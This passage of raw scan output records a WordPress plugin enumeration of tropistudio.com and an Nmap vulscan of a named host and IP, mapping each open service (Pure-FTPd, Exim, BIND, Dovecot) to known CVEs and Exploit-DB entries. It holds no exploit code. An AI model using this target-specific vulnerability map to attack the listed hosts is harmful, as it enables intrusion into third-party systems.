12297[I] http://tropistudio.com/wp-includes/ID3/license.txt
12298[I] http://tropistudio.com/wp-includes/ID3/readme.txt
12299[I] http://tropistudio.com/wp-includes/images/crystal/license.txt
12300[I] http://tropistudio.com/wp-includes/js/plupload/license.txt
12301[I] http://tropistudio.com/wp-includes/js/swfupload/license.txt
12302[I] http://tropistudio.com/wp-includes/js/tinymce/license.txt
12303[-] Searching Wordpress Plugins ...
12304[I] button v1.7.25
12305[I] duplicator v1.3.28
12306[M] EDB-ID: 38676 "WordPress Plugin Duplicator - Cross-Site Scripting"
12307[M] EDB-ID: 44288 "WordPress Plugin Duplicator 1.2.32 - Cross-Site Scripting"
12308[I] gtranslate v2.8.53
12309[I] slider-wd v1.2.31
12310[I] super-video-player v1.2
12311[I] wp-zombaio v1.0.6.2
12312[I] Checking for Directory Listing Enabled ...
12313[-] Date & Time: 29/02/2020 01:52:48
12314[-] Completed in: 0:14:00
12315#####################################################################################################################################
12316Starting Nmap 7.80 ( https://nmap.org ) at 2020-02-29 02:03 EST
12317Nmap scan report for web16.support-emilid.com (111.90.145.39)
12318Host is up (0.50s latency).
12319Not shown: 980 closed ports
12320PORT STATE SERVICE VERSION
1232121/tcp open ftp Pure-FTPd
12322| vulscan: VulDB - https://vuldb.com:
12323| [102925] Foscam C1 Indoor HD Camera 2.52.2.37 Web Management Interface pureftpd.passwd HTTP Request privilege escalation
12324| [57510] Pureftpd Pure-FTPd up to 0.x Memory Consumption denial of service
12325| [57504] Pureftpd Pure-FTPd up to 0.x ftp_parser.c Cleartext unknown vulnerability
12326|
12327| MITRE CVE - https://cve.mitre.org:
12328| [CVE-2004-0656] The accept_client function in PureFTPd 1.0.18 and earlier allows remote attackers to cause a denial of service by exceeding the maximum number of connections.
12329|
12330| SecurityFocus - https://www.securityfocus.com/bid/:
12331| [10664] PureFTPd Accept_Client Remote Denial of Service Vulnerability
12332|
12333| IBM X-Force - https://exchange.xforce.ibmcloud.com:
12334| No findings
12335|
12336| Exploit-DB - https://www.exploit-db.com:
12337| No findings
12338|
12339| OpenVAS (Nessus) - http://www.openvas.org:
12340| No findings
12341|
12342| SecurityTracker - https://www.securitytracker.com:
12343| [1010701] PureFTPd Logic Bug in accept_client() Lets Remote Users Crash the FTP Daemon
12344| [1008135] (Claim is Retracted) PureFTPd Buffer Overflow in displayrate() Lets Remote Users Crash the Service
12345| [1002993] PurePostPro Script Add-on for PureFTPd and MySQL Allows Remote Users to Execute SQL Commands on the Server
12346| [1001126] PureFTPd May Allow Remote Users to Deny Service on the Server
12347|
12348| OSVDB - http://www.osvdb.org:
12349| No findings
12350|_
1235125/tcp open smtp Exim smtpd 4.92
12352| vulscan: VulDB - https://vuldb.com:
12353| [141327] Exim up to 4.92.1 Backslash privilege escalation
12354| [138827] Exim up to 4.92 Expansion Code Execution
12355| [135932] Exim up to 4.92 privilege escalation
12356| [113048] Exim up to 4.90 SMTP Listener Message memory corruption
12357|
12358| MITRE CVE - https://cve.mitre.org:
12359| [CVE-2012-5671] Heap-based buffer overflow in the dkim_exim_query_dns_txt function in dkim.c in Exim 4.70 through 4.80, when DKIM support is enabled and acl_smtp_connect and acl_smtp_rcpt are not set to "warn control = dkim_disable_verify," allows remote attackers to execute arbitrary code via an email from a malicious DNS server.
12360| [CVE-2012-0478] The texImage2D implementation in the WebGL subsystem in Mozilla Firefox 4.x through 11.0, Firefox ESR 10.x before 10.0.4, Thunderbird 5.0 through 11.0, Thunderbird ESR 10.x before 10.0.4, and SeaMonkey before 2.9 does not properly restrict JSVAL_TO_OBJECT casts, which might allow remote attackers to execute arbitrary code via a crafted web page.
12361| [CVE-2011-1764] Format string vulnerability in the dkim_exim_verify_finish function in src/dkim.c in Exim before 4.76 might allow remote attackers to execute arbitrary code or cause a denial of service (daemon crash) via format string specifiers in data used in DKIM logging, as demonstrated by an identity field containing a % (percent) character.
12362| [CVE-2011-1407] The DKIM implementation in Exim 4.7x before 4.76 permits matching for DKIM identities to apply to lookup items, instead of only strings, which allows remote attackers to execute arbitrary code or access a filesystem via a crafted identity.
12363| [CVE-2011-0017] The open_log function in log.c in Exim 4.72 and earlier does not check the return value from (1) setuid or (2) setgid system calls, which allows local users to append log data to arbitrary files via a symlink attack.
12364| [CVE-2010-4345] Exim 4.72 and earlier allows local users to gain privileges by leveraging the ability of the exim user account to specify an alternate configuration file with a directive that contains arbitrary commands, as demonstrated by the spool_directory directive.
12365| [CVE-2010-4344] Heap-based buffer overflow in the string_vformat function in string.c in Exim before 4.70 allows remote attackers to execute arbitrary code via an SMTP session that includes two MAIL commands in conjunction with a large message containing crafted headers, leading to improper rejection logging.
12366| [CVE-2010-2024] transports/appendfile.c in Exim before 4.72, when MBX locking is enabled, allows local users to change permissions of arbitrary files or create arbitrary files, and cause a denial of service or possibly gain privileges, via a symlink attack on a lockfile in /tmp/.
12367| [CVE-2010-2023] transports/appendfile.c in Exim before 4.72, when a world-writable sticky-bit mail directory is used, does not verify the st_nlink field of mailbox files, which allows local users to cause a denial of service or possibly gain privileges by creating a hard link to another user's file.
12368| [CVE-2006-1251] Argument injection vulnerability in greylistclean.cron in sa-exim 4.2 allows remote attackers to delete arbitrary files via an email with a To field that contains a filename separated by whitespace, which is not quoted when greylistclean.cron provides the argument to the rm command.
12369| [CVE-2005-0022] Buffer overflow in the spa_base64_to_bits function in Exim before 4.43, as originally obtained from Samba code, and as called by the auth_spa_client function, may allow attackers to execute arbitrary code during SPA authentication.
12370| [CVE-2005-0021] Multiple buffer overflows in Exim before 4.43 may allow attackers to execute arbitrary code via (1) an IPv6 address with more than 8 components, as demonstrated using the -be command line option, which triggers an overflow in the host_aton function, or (2) the -bh command line option or dnsdb PTR lookup, which triggers an overflow in the dns_build_reverse function.
12371| [CVE-2004-0400] Stack-based buffer overflow in Exim 4 before 4.33, when the headers_check_syntax option is enabled, allows remote attackers to cause a denial of service and possibly execute arbitrary code during the header check.
12372| [CVE-2004-0399] Stack-based buffer overflow in Exim 3.35, and other versions before 4, when the sender_verify option is true, allows remote attackers to cause a denial of service and possibly execute arbitrary code during sender verification.
12373| [CVE-2003-0743] Heap-based buffer overflow in smtp_in.c for Exim 3 (exim3) before 3.36 and Exim 4 (exim4) before 4.21 may allow remote attackers to execute arbitrary code via an invalid (1) HELO or (2) EHLO argument with a large number of spaces followed by a NULL character and a newline, which is not properly trimmed before the "(no argument given)" string is appended to the buffer.
12374| [CVE-2002-1381] Format string vulnerability in daemon.c for Exim 4.x through 4.10, and 3.x through 3.36, allows exim administrative users to execute arbitrary code by modifying the pid_file_path value.
12375|
12376| SecurityFocus - https://www.securityfocus.com/bid/:
12377| [103049] Exim 'base64d()' Function Buffer Overflow Vulnerability
12378| [99252] Exim CVE-2017-1000369 Local Privilege Escalation Vulnerability
12379| [94947] Exim CVE-2016-9963 Unspecified Information Disclosure Vulnerability
12380| [84132] Exim CVE-2016-1531 Local Privilege Escalation Vulnerability
12381| [68857] Exim CVE-2014-2972 Local Privilege Escalation Vulnerability
12382| [67695] Exim 'dmarc.c' Remote Code Execution Vulnerability
12383| [60465] Exim for Dovecot 'use_shell' Remote Command Execution Vulnerability
12384| [56285] Exim DKIM DNS Decoding CVE-2012-5671 Remote Buffer Overflow Vulnerability
12385| [47836] Exim DKIM CVE-2011-1407 Remote Code Execution Vulnerability
12386| [47736] Exim 'dkim_exim_verify_finish()' Remote Format String Vulnerability
12387| [46065] Exim 'log.c' Local Privilege Escalation Vulnerability
12388| [45341] Exim ALT_CONFIG_ROOT_ONLY 'exim' User Local Privilege Escalation Vulnerability
12389| [45308] Exim Crafted Header Remote Code Execution Vulnerability
12390| [40454] Exim MBX Locking Insecure Temporary File Creation Vulnerability
12391| [40451] Exim Sticky Mail Directory Local Privilege Escalation Vulnerability
12392| [36181] ikiwiki 'teximg' Plugin Insecure TeX Commands Information Disclosure Vulnerability
12393| [23977] Exim SpamAssassin Reply Remote Buffer Overflow Vulnerability
12394| [17110] sa-exim Unauthorized File Access Vulnerability
12395| [12268] Exim IP Address Command Line Argument Local Buffer Overflow Vulnerability
12396| [12188] Exim SPA Authentication Remote Buffer Overflow Vulnerability
12397| [12185] Exim Illegal IPv6 Address Buffer Overflow Vulnerability
12398| [10291] Exim Header Syntax Checking Remote Stack Buffer Overrun Vulnerability
12399| [10290] Exim Sender Verification Remote Stack Buffer Overrun Vulnerability
12400| [8518] Exim EHLO/HELO Remote Heap Corruption Vulnerability
12401| [6314] Exim Internet Mailer Format String Vulnerability
12402| [4096] Exim Configuration File Argument Command Line Buffer Overflow Vulnerability
12403| [3728] Exim Pipe Hostname Arbitrary Command Execution Vulnerability
12404| [2828] Exim Format String Vulnerability
12405| [1859] Exim Buffer Overflow Vulnerability
12406|
12407| IBM X-Force - https://exchange.xforce.ibmcloud.com:
12408| [84758] Exim sender_address parameter command execution
12409| [84015] Exim command execution
12410| [80186] Mozilla Firefox, Thunderbird, and SeaMonkey copyTexImage2D code execution
12411| [80184] Mozilla Firefox, Thunderbird, and SeaMonkey texImage2D calls code execution
12412| [79615] Exim dkim_exim_query_dns_txt() buffer overflow
12413| [75155] Mozilla Firefox, Thunderbird, and SeaMonkey texImage2D denial of service
12414| [67455] Exim DKIM processing code execution
12415| [67299] Exim dkim_exim_verify_finish() format string
12416| [65028] Exim open_log privilege escalation
12417| [63967] Exim config file privilege escalation
12418| [63960] Exim header buffer overflow
12419| [59043] Exim mail directory privilege escalation
12420| [59042] Exim MBX symlink
12421| [52922] ikiwiki teximg plugin information disclosure
12422| [34265] Exim spamd buffer overflow
12423| [25286] Sa-exim greylistclean.cron file deletion
12424| [22687] RHSA-2005:025 updates for exim not installed
12425| [18901] Exim dns_build_reverse buffer overflow
12426| [18764] Exim spa_base64_to_bits function buffer overflow
12427| [18763] Exim host_aton buffer overflow
12428| [16079] Exim require_verify buffer overflow
12429| [16077] Exim header_check_syntax buffer overflow
12430| [16075] Exim sender_verify buffer overflow
12431| [13067] Exim HELO or EHLO command heap overflow
12432| [10761] Exim daemon.c format string
12433| [8194] Exim configuration file -c command-line argument buffer overflow
12434| [7738] Exim allows attacker to hide commands in localhost names using pipes
12435| [6671] Exim "
12436| [1893] Exim MTA allows local users to gain root privileges
12437|
12438| Exploit-DB - https://www.exploit-db.com:
12439| [16925] Exim4 <= 4.69 - string_format Function Heap Buffer Overflow
12440| [15725] Exim 4.63 Remote Root Exploit
12441| [1009] Exim <= 4.41 dns_build_reverse Local Exploit
12442| [812] Exim <= 4.43 auth_spa_server() Remote PoC Exploit
12443| [796] Exim <= 4.42 Local Root Exploit
12444| [756] Exim <= 4.41 dns_build_reverse Local Exploit PoC
12445|
12446| OpenVAS (Nessus) - http://www.openvas.org:
12447| [100663] Exim < 4.72 RC2 Multiple Vulnerabilities
12448|
12449| SecurityTracker - https://www.securitytracker.com:
12450| [1025539] Exim DKIM Processing Flaw Lets Remote Users Execute Arbitrary Code
12451| [1025504] Exim DKIM Signature Format String Flaw Lets Remote Users Execute Arbitrary Code
12452| [1024859] Exim Configuration File Capability Lets Local Users Gain Elevated Privileges
12453| [1024858] Exim Buffer Overfow in string_format() Lets Remote Users Execute Arbitrary Code
12454| [1012904] Exim Buffer Overflow in dns_build_reverse() Lets Local Users Obtain Elevated Privileges
12455| [1012771] Exim Buffer Overflows in host_aton() and spa_base64_to_bits() May Let Local Users Gain Elevated Privileges
12456| [1010081] Exim Buffer Overflows in 'accept.c' and 'verify.c' Let Remote Users Execute Arbitrary Code
12457| [1007609] Exim Heap Overflow in 'smtp_in.c' May Allow Remote Arbitrary Code Execution
12458| [1005756] Exim Mail Server Format String Bug Lets Local Exim Administrators Execute Arbitrary Code With Root Privileges
12459| [1003547] Potential Bug in Exim Mail Server May Let Local Users Execute Code With Root Privileges
12460| [1003014] Exim Mail Server Pipe Address Validation Error May Let Remote Users Execute Arbitrary Code With Root Privileges in a Certain Configuration
12461| [1001694] Exim Mail Server May Allow Remote Users to Execute Arbitrary Code with Root-Level Privileges on the Server
12462|
12463| OSVDB - http://www.osvdb.org:
12464| [93004] Dovecot with Exim sender_address Parameter Remote Command Execution
12465| [87599] Mozilla Multiple Product copyTexImage2D Call Image Dimension Handling Memory Corruption
12466| [87581] Mozilla Multiple Product texImage2D Call Handling Memory Corruption
12467| [86616] Exim src/dkim.c dkim_exim_query_dns_txt() Function DNS Record Parsing Remote Overflow
12468| [81523] Mozilla Multiple Product WebGL texImage2D() Function JSVAL_TO_OBJECT Remote Code Execution
12469| [72642] Exim DKIM Identity Lookup Item Remote Code Execution
12470| [72156] Exim src/dkim.c dkim_exim_verify_finish() Function DKIM-Signature Header Format String
12471| [70696] Exim log.c open_log() Function Local Privilege Escalation
12472| [69860] Exim exim User Account Configuration File Directive Local Privilege Escalation
12473| [69685] Exim string_format Function Remote Overflow
12474| [65159] Exim transports/appendfile.c MBX Locking Race Condition Permission Modification
12475| [65158] Exim transports/appendfile.c Hardlink Handling Arbitrary File Overwrite
12476| [57575] teximg Plugin for ikiwiki TEX Command Arbitrary File Local Disclosure
12477| [23849] sa-exim greylistclean.cron Arbitrary File Deletion
12478| [13073] Oracle Database Server Advanced Queuing Component dbms_transform_eximp Unspecified Security Issue
12479| [12946] Exim -bh Command Line Option dns_build_reverse Function Local Overflow
12480| [12727] Exim SPA Authentication spa_base64_to_bits Function Remote Overflow
12481| [12726] Exim -be Command Line Option host_aton Function Local Overflow
12482| [10877] Exim smtp_in.c HELO/EHLO Remote Overflow
12483| [10360] Exim daemon.c pid_file_path Variable Manipulation Arbitrary Command Execution
12484| [10032] libXpm CreateXImage Function Integer Overflow
12485| [7160] Exim .forward :include: Option Privilege Escalation
12486| [6479] Vexim COOKIE Authentication Credential Disclosure
12487| [6478] Vexim Multiple Parameter SQL Injection
12488| [5930] Exim Parenthesis File Name Filter Bypass
12489| [5897] Exim header_syntax Function Remote Overflow
12490| [5896] Exim sender_verify Function Remote Overflow
12491| [5530] Exim Localhost Name Arbitrary Command Execution
12492| [5330] Exim Configuration File Variable Overflow
12493| [1855] Exim Batched SMTP Mail Header Format String
12494|_
1249553/tcp open domain ISC BIND 9.8.2rc1 (RedHat Enterprise Linux 6)
12496| vulscan: VulDB - https://vuldb.com:
12497| [93249] ISC BIND up to 9.8.x/9.9.9-P3/9.9.9-S5/9.10.4-P3/9.11.0 DNAME Response db.c denial of service
12498| [93015] ISC BIND up to 9.8.4/9.9.2 Packet Option DNS Packet Crash denial of service
12499| [80354] ISC BIND up to 9.8.8/9.9.8-P2/9.9.8-S3/9.10.3-P2 Address Prefix List apl_42.c denial of service
12500| [77552] ISC BIND up to 9.8.8/9.9.7-P2/9.10.2-P3 OpenPGP Key openpgpkey_61.c denial of service
12501| [77551] ISC BIND up to 9.8.8/9.9.7-P2/9.10.2-P3 DNSSEC Key buffer.c denial of service
12502| [13184] ISC BIND 9.8.1-P1 Smoothed Round Trip Time Algorithm DNS spoofing
12503| [9946] ISC BIND 9.8.1-P1 SRTT Algorithm privilege escalation
12504| [4443] ISC BIND up to 9.8.x Recursive Query Processor denial of service
12505| [57895] ISC BIND 9.8.0/9.8.1 Crash denial of service
12506| [4357] ISC BIND up to 9.8.x Negative Caching RRSIG RRsets denial of service
12507| [57404] ISC BIND 9.8.0 denial of service
12508| [135686] Bosch Smart Home Controller up to 9.8 Backup information disclosure
12509| [135684] Bosch Smart Home Controller up to 9.8 JSON-RPC Interface information disclosure
12510| [129940] Adobe Connect up to 9.8.1 Session Token information disclosure
12511| [117535] Synacor Zimbra Collaboration up to 8.6.0 Patch 9/8.7.11 Patch 2/8.8.7 mailboxd Error information disclosure
12512| [11371] Cisco ONS 15454 9.8.0 Controller Card denial of service
12513|
12514| MITRE CVE - https://cve.mitre.org:
12515| [CVE-2013-4854] The RFC 5011 implementation in rdata.c in ISC BIND 9.7.x and 9.8.x before 9.8.5-P2, 9.8.6b1, 9.9.x before 9.9.3-P2, and 9.9.4b1, and DNSco BIND 9.9.3-S1 before 9.9.3-S1-P1 and 9.9.4-S1b1, allows remote attackers to cause a denial of service (assertion failure and named daemon exit) via a query with a malformed RDATA section that is not properly handled during construction of a log message, as exploited in the wild in July 2013.
12516| [CVE-2013-3919] resolver.c in ISC BIND 9.8.5 before 9.8.5-P1, 9.9.3 before 9.9.3-P1, and 9.6-ESV-R9 before 9.6-ESV-R9-P1, when a recursive resolver is configured, allows remote attackers to cause a denial of service (assertion failure and named daemon exit) via a query for a record in a malformed zone.
12517| [CVE-2013-2266] libdns in ISC BIND 9.7.x and 9.8.x before 9.8.4-P2, 9.8.5 before 9.8.5b2, 9.9.x before 9.9.2-P2, and 9.9.3 before 9.9.3b2 on UNIX platforms allows remote attackers to cause a denial of service (memory consumption) via a crafted regular expression, as demonstrated by a memory-exhaustion attack against a machine running a named process.
12518| [CVE-2012-5689] ISC BIND 9.8.x through 9.8.4-P1 and 9.9.x through 9.9.2-P1, in certain configurations involving DNS64 with a Response Policy Zone that lacks an AAAA rewrite rule, allows remote attackers to cause a denial of service (assertion failure and named daemon exit) via a query for an AAAA record.
12519| [CVE-2012-5688] ISC BIND 9.8.x before 9.8.4-P1 and 9.9.x before 9.9.2-P1, when DNS64 is enabled, allows remote attackers to cause a denial of service (assertion failure and daemon exit) via a crafted query.
12520| [CVE-2012-5166] ISC BIND 9.x before 9.7.6-P4, 9.8.x before 9.8.3-P4, 9.9.x before 9.9.1-P4, and 9.4-ESV and 9.6-ESV before 9.6-ESV-R7-P4 allows remote attackers to cause a denial of service (named daemon hang) via unspecified combinations of resource records.
12521| [CVE-2012-4244] ISC BIND 9.x before 9.7.6-P3, 9.8.x before 9.8.3-P3, 9.9.x before 9.9.1-P3, and 9.4-ESV and 9.6-ESV before 9.6-ESV-R7-P3 allows remote attackers to cause a denial of service (assertion failure and named daemon exit) via a query for a long resource record.
12522| [CVE-2012-1667] ISC BIND 9.x before 9.7.6-P1, 9.8.x before 9.8.3-P1, 9.9.x before 9.9.1-P1, and 9.4-ESV and 9.6-ESV before 9.6-ESV-R7-P1 does not properly handle resource records with a zero-length RDATA section, which allows remote DNS servers to cause a denial of service (daemon crash or data corruption) or obtain sensitive information from process memory via a crafted record.
12523| [CVE-2012-1033] The resolver in ISC BIND 9 through 9.8.1-P1 overwrites cached server names and TTL values in NS records during the processing of a response to an A record query, which allows remote attackers to trigger continued resolvability of revoked domain names via a "ghost domain names" attack.
12524| [CVE-2011-4313] query.c in ISC BIND 9.0.x through 9.6.x, 9.4-ESV through 9.4-ESV-R5, 9.6-ESV through 9.6-ESV-R5, 9.7.0 through 9.7.4, 9.8.0 through 9.8.1, and 9.9.0a1 through 9.9.0b1 allows remote attackers to cause a denial of service (assertion failure and named exit) via unknown vectors related to recursive DNS queries, error logging, and the caching of an invalid record by the resolver.
12525| [CVE-2011-2465] Unspecified vulnerability in ISC BIND 9 9.8.0, 9.8.0-P1, 9.8.0-P2, and 9.8.1b1, when recursion is enabled and the Response Policy Zone (RPZ) contains DNAME or certain CNAME records, allows remote attackers to cause a denial of service (named daemon crash) via an unspecified query.
12526| [CVE-2011-2464] Unspecified vulnerability in ISC BIND 9 9.6.x before 9.6-ESV-R4-P3, 9.7.x before 9.7.3-P3, and 9.8.x before 9.8.0-P4 allows remote attackers to cause a denial of service (named daemon crash) via a crafted UPDATE request.
12527| [CVE-2011-1910] Off-by-one error in named in ISC BIND 9.x before 9.7.3-P1, 9.8.x before 9.8.0-P2, 9.4-ESV before 9.4-ESV-R4-P1, and 9.6-ESV before 9.6-ESV-R4-P1 allows remote DNS servers to cause a denial of service (assertion failure and daemon exit) via a negative response containing large RRSIG RRsets.
12528| [CVE-2011-1907] ISC BIND 9.8.x before 9.8.0-P1, when Response Policy Zones (RPZ) RRset replacement is enabled, allows remote attackers to cause a denial of service (assertion failure and daemon exit) via an RRSIG query.
12529| [CVE-2010-1567] The SIP implementation on the Cisco PGW 2200 Softswitch with software before 9.8(1)S5 allows remote attackers to cause a denial of service (device crash) via a malformed header, aka Bug ID CSCsz13590.
12530|
12531| SecurityFocus - https://www.securityfocus.com/bid/:
12532| [48264] Aastra 9480i CT Multiple Information Disclosure Vulnerabilities
12533| [61774] ISC BIND 9 SRTT Algorithm Authoritative Server Selection Security Vulnerability
12534| [61479] ISC BIND 9 DNS RDATA Handling CVE-2013-4854 Remote Denial of Service Vulnerability
12535| [58736] ISC BIND 9 'libdns' Remote Denial of Service Vulnerability
12536| [57556] ISC BIND 9 DNS64 CVE-2012-5689 Remote Denial of Service Vulnerability
12537| [56817] ISC BIND 9 DNS64 Remote Denial of Service Vulnerability
12538| [55852] ISC BIND 9 DNS RDATA Handling CVE-2012-5166 Remote Denial of Service Vulnerability
12539| [55522] ISC BIND 9 DNS Resource Records Handling CVE-2012-4244 Remote Denial of Service Vulnerability
12540| [54659] ISC BIND 9 TCP Query Remote Denial of Service Vulnerability
12541| [54658] ISC BIND 9 DNSSEC Validation CVE-2012-3817 Denial of Service Vulnerability
12542| [53772] ISC BIND 9 DNS Resource Records Handling Remote Denial of Service Vulnerability
12543| [50690] ISC BIND 9 Recursive Queries Remote Denial of Service Vulnerability
12544| [48566] ISC BIND 9 Unspecified Packet Processing Remote Denial of Service Vulnerability
12545| [48565] ISC BIND 9 RPZ Configurations Remote Denial of Service Vulnerabilities
12546| [48007] ISC BIND 9 Large RRSIG RRsets Remote Denial of Service Vulnerability
12547| [47734] ISC BIND 9 RRSIG Query Type Remote Denial of Service Vulnerability
12548| [46491] ISC BIND 9 IXFR Transfer/DDNS Update Remote Denial of Service Vulnerability
12549| [45385] ISC BIND 9 DNSSEC Validation Remote Denial of Service Vulnerability
12550| [45133] ISC BIND 9 'RRSIG' Record Type Negative Cache Remote Denial of Service Vulnerability
12551| [41730] ISC BIND 9 'RRSIG' Record Type Remote Denial of Service Vulnerability
12552| [37865] ISC BIND 9 DNSSEC Bogus NXDOMAIN Response Remote Cache Poisoning Vulnerability
12553| [37118] ISC BIND 9 DNSSEC Query Response Additional Section Remote Cache Poisoning Vulnerability
12554| [35848] ISC BIND 9 Remote Dynamic Update Message Denial of Service Vulnerability
12555| [25076] ISC BIND 9 Default ACL Settings Recursive Queries And Cached Content Security Bypass Vulnerability
12556| [25037] ISC BIND 9 Remote Cache Poisoning Vulnerability
12557| [4936] ISC BIND 9 Remote Denial Of Service Vulnerability
12558|
12559| IBM X-Force - https://exchange.xforce.ibmcloud.com:
12560| [85799] Cisco Unified IP Phones 9900 Series directory traversal
12561| [75412] Cisco Unified IP Phones 9900 series RT privilege escalation
12562| [68733] Cisco 9000 Series Aggregation Service Router IPv4 packet denial of service
12563| [9704] Multiple Lucent router UDP port 9 could disclose sensitive information
12564| [9250] BIND 9 dns_message_findtype() denial of service
12565| [1852] BIND prior to 4.9.7 buffer overflow affects Digital Firewall 97 users
12566| [539] Microsoft Windows 95 and Internet Explorer password disclosure
12567| [86004] ISC BIND RDATA denial of service
12568| [84767] ISC BIND denial of service
12569| [83066] ISC BIND denial of service
12570| [81504] ISC BIND AAAA denial of service
12571| [80510] ISC BIND DNS64 denial of service
12572| [79121] ISC BIND queries denial of service
12573| [78479] ISC BIND RDATA denial of service
12574| [77185] ISC BIND TCP queries denial of service
12575| [77184] ISC BIND bad cache denial of service
12576| [76034] ISC BIND rdata denial of service
12577| [73053] ISC BIND cache update policy security bypass
12578| [71332] ISC BIND recursive queries denial of service
12579| [68375] ISC BIND UPDATE denial of service
12580| [68374] ISC BIND Response Policy Zones denial of service
12581| [67665] ISC BIND RRSIG Rrsets denial of service
12582| [67297] ISC BIND RRSIG denial of service
12583| [65554] ISC BIND IXFR transfer denial of service
12584| [63602] ISC BIND allow-query security bypass
12585| [63596] ISC BIND zone data security bypass
12586| [63595] ISC BIND RRSIG denial of service
12587| [62072] ISC BIND DNSSEC query denial of service
12588| [62071] ISC BIND ACL security bypass
12589| [61871] ISC BIND anchors denial of service
12590| [60421] ISC BIND RRSIG denial of service
12591| [56049] ISC BIND out-of-bailiwick weak security
12592| [55937] ISC Bind unspecified cache poisoning
12593| [55753] ISC BIND DNSSEC NSEC/NSEC3 cache poisoning
12594| [54416] ISC BIND DNSSEC cache poisoning
12595| [52073] ISC BIND dns_db_findrdataset() denial of service
12596| [47409] Multiple Mozilla products XBL loadBindingDocument information disclosure
12597| [45234] ISC BIND UDP denial of service
12598| [39670] ISC BIND inet_network buffer overflow
12599| [37233] libgssapi ISC BIND Novell SUSE Linux Enterprise Server GSS-TSIG request denial of service
12600| [37128] RHSA update for ISC BIND RRset denial of service not installed
12601| [37127] RHSA update for ISC BIND named service denial of service not installed
12602| [36275] ISC BIND DNS query spoofing
12603| [35575] ISC BIND query ID cache poisoning
12604| [35571] ISC BIND ACL security bypass
12605| [31838] ISC BIND RRset denial of service
12606| [31799] ISC BIND named service denial of service
12607| [29876] HP Tru64 ypbind core dump information disclosure
12608| [28745] ISC BIND DNSSEC RRset denial of service
12609| [28744] ISC BIND recursive INSIST denial of service
12610| [22041] BEA WebLogic Server and Express LDAP anonymous bind information disclosure
12611| [18836] BIND hostname disclosure
12612| [10624] ISC BIND DNS stub resolver library (libresolv.a) stack buffer overflows
12613| [10333] ISC BIND SIG null pointer dereference denial of service
12614| [10332] ISC BIND OPT resource record (RR) denial of service
12615| [10304] ISC BIND SIG cached resource records (RR) heap buffer overflow
12616| [7027] Cisco CBOS Web-based configuration utility binds to port 80 by default
12617| [5814] ISC BIND "
12618| [5540] ISC BIND can be remotely crashed by issuing ZXFR requests
12619| [5462] ISC BIND AXFR host command remote buffer overflow
12620|
12621| Exploit-DB - https://www.exploit-db.com:
12622| [17376] Aastra IP Phone 9480i Web Interface Data disclosure Vulnerability
12623| [9300] ISC BIND 9 Remote Dynamic Update Message Denial of Service PoC
12624|
12625| OpenVAS (Nessus) - http://www.openvas.org:
12626| [103090] ISC BIND 9 IXFR Transfer/DDNS Update Remote Denial of Service Vulnerability
12627| [103031] ISC BIND 9 < 9.7.2-P2 Multiple Vulnerabilities
12628| [103030] ISC BIND 9 'RRSIG' Record Type Negative Cache Remote Denial of Service Vulnerability
12629| [100717] ISC BIND 9 'RRSIG' Record Type Remote Denial of Service Vulnerability
12630| [100458] ISC BIND 9 DNSSEC Bogus NXDOMAIN Response Remote Cache Poisoning Vulnerability
12631| [100362] ISC BIND 9 DNSSEC Query Response Additional Section Remote Cache Poisoning Vulnerability
12632| [100251] ISC BIND 9 Remote Dynamic Update Message Denial of Service Vulnerability
12633| [63208] Fedora Core 9 FEDORA-2009-0350 (bind)
12634| [11226] Oracle 9iAS default error information disclosure
12635|
12636| SecurityTracker - https://www.securitytracker.com:
12637| [1025811] Cisco ASR 9000 Series Router IPv4 Packet Processing Flaw Lets Remote Users Deny Service
12638| [1012995] BIND 9 Validator Assumption Error May Let Remote Users Deny Service
12639| [1005048] Oracle Enterprise Manager Web Service Component of Oracle 9i Application Server Discloses the Web Cache Administrator Password to Local Users
12640| [1003675] Oracle 9iAS Application Server Discloses CGI-BIN Script Source Code to Remote Users
12641| [1001186] Microsoft Windows Me Operating System and Windows 98 with the Plus! 98 Package Disclose Data Compression Passwords
12642| [1028901] (McAfee Issues Advisory for McAfee Email Gateway) ISC BIND RDATA Processing Bug Lets Remote Users Deny Service
12643| [1028900] (McAfee Issues Advisory for McAfee Email and Web Security Appliance) ISC BIND RDATA Processing Bug Lets Remote Users Deny Service
12644| [1028899] (McAfee Issues Fix for McAfee Web Gateway) ISC BIND RDATA Processing Bug Lets Remote Users Deny Service
12645| [1028866] (McAfee Issues Fix for McAfee Firewall Enterprise) ISC BIND RDATA Processing Bug Lets Remote Users Deny Service
12646| [1028854] (NetBSD Issues Fix) ISC BIND RDATA Processing Bug Lets Remote Users Deny Service
12647| [1028849] (Red Hat Issues Fix) ISC BIND RDATA Processing Bug Lets Remote Users Deny Service
12648| [1028848] (Red Hat Issues Fix) ISC BIND RDATA Processing Bug Lets Remote Users Deny Service
12649| [1028839] (FreeBSD Issues Fix) ISC BIND RDATA Processing Bug Lets Remote Users Deny Service
12650| [1028838] ISC BIND RDATA Processing Bug Lets Remote Users Deny Service
12651| [1028632] ISC BIND RUNTIME_CHECK Error Lets Remote Users Deny Service Against Recursive Resolvers
12652| [1028046] ISC BIND DNS64 and Response Policy Zones (RPZ) Bug Lets Remote Users Deny Service
12653| [1027835] ISC BIND DNS64 Bug Lets Remote Users Deny Service
12654| [1027642] ISC BIND RDATA Processing Flaw Lets Remote Users Deny Service
12655| [1027529] ISC BIND RDATA Processing Flaw Lets Remote Users Deny Service
12656| [1026647] ISC BIND Cache Update Policy Can Be Bypassed to Allow Revoked Domain Names to Remain Resolvable
12657| [1026335] ISC BIND Invalid Record Caching Flaw Lets Remote Users Deny Service
12658| [1025743] ISC BIND Response Policy Zones DNAME/CNAME Processing Flaw Lets Remote Users Deny Service
12659| [1025742] ISC BIND Packet Processing Flaw Lets Remote Users Deny Service
12660| [1015850] Samba winbindd Daemon Discloses Server Password to Local Users
12661| [1003359] BindView NETinventory Discloses Password to Local Users During Auditing
12662| [1001721] BIND Domain Name System Software May Disclose DNS Transactional Signature (TSIG) Keys to Local Users
12663|
12664| OSVDB - http://www.osvdb.org:
12665| [72941] Aastra 9480i IP Phone Multiple Configuration File Direct Request Information Disclosure
12666|_
1266780/tcp open ssl/http Apache/2
12668|_http-server-header: Apache/2
12669110/tcp open pop3 Dovecot DirectAdmin pop3d
12670| vulscan: VulDB - https://vuldb.com:
12671| [139289] cPanel up to 68.0.14 dovecot-xaps-plugin Format privilege escalation
12672| [134480] Dovecot up to 2.3.5.2 Submission-Login Crash denial of service
12673| [134479] Dovecot up to 2.3.5.2 IMAP Server Crash denial of service
12674| [134243] InfinitumIT DirectAdmin up to 1.561 FileManager CSRF privilege escalation
